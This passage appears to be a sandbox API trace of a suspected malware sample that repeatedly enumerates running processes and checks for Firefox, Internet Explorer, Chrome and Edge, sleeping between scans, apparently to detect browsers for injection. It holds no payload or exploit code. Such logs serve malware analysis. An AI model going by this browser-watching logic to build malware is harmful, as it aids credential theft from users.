lpString2="firefox.exe") returned -1 [0256.811] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0256.811] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0256.811] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0256.811] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0256.811] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0256.811] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0256.811] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0256.811] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0256.811] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0256.812] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0256.812] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0256.812] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0256.812] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0256.812] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.812] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0256.812] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0256.813] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0256.813] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0256.813] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0256.813] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0256.813] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0256.813] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0256.813] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0256.813] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.814] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0256.814] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0256.814] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0256.814] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0256.814] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0256.814] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0256.814] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0256.814] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0256.814] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0256.814] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0256.815] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0256.815] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0256.815] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0256.815] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0256.815] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0256.815] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0256.815] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0256.815] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0256.815] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0256.815] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0256.816] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0256.816] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0256.816] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0256.816] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0256.816] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0256.816] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0256.816] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0256.816] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0256.817] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0256.817] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0256.817] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0256.817] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0256.817] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0256.817] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0256.817] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0256.818] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0256.818] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0256.818] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0256.818] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0256.818] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0256.818] CloseHandle (hObject=0xd4) returned 1 [0256.818] Sleep (dwMilliseconds=0x3e8) [0257.838] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0257.839] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0257.840] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0257.840] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0257.840] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0257.840] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0257.840] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0257.840] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0257.840] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0257.840] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0257.840] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0257.840] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0257.841] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0257.841] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0257.841] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0257.841] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.841] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0257.841] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0257.841] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0257.842] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0257.842] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0257.842] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0257.842] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0257.842] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0257.842] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0257.842] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.842] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0257.843] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0257.843] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0257.843] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0257.843] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0257.843] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0257.843] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0257.843] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0257.843] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0257.843] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.843] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0257.844] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0257.844] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0257.844] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0257.844] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.844] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0257.844] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0257.844] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0257.844] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0257.844] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0257.844] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0257.845] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0257.845] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0257.845] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0257.845] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0257.845] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.845] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0257.846] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0257.846] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0257.846] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.846] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.846] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0257.846] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0257.846] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0257.846] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.846] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.847] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0257.847] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0257.847] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0257.847] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.847] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.847] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0257.847] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0257.847] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0257.847] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.847] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.848] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0257.848] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0257.848] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0257.848] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.848] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0257.848] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0257.848] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0257.848] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0257.848] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0257.848] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.849] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0257.849] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0257.849] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0257.849] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.849] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.850] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0257.850] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0257.850] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0257.850] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.850] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0257.850] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0257.850] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0257.850] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0257.850] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0257.850] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0257.851] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0257.851] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0257.851] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0257.851] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.851] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0257.851] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0257.851] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0257.851] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0257.851] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.851] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.852] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0257.852] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0257.852] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0257.852] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.852] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0257.852] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0257.852] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0257.852] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0257.852] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.852] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0257.853] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0257.853] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0257.853] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0257.853] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0257.853] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0257.854] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0257.854] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0257.854] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0257.854] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0257.854] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0257.854] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0257.854] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0257.854] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0257.854] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.854] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0257.855] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0257.855] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0257.855] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0257.855] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0257.855] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0257.855] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0257.855] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0257.855] lstrcmpiA 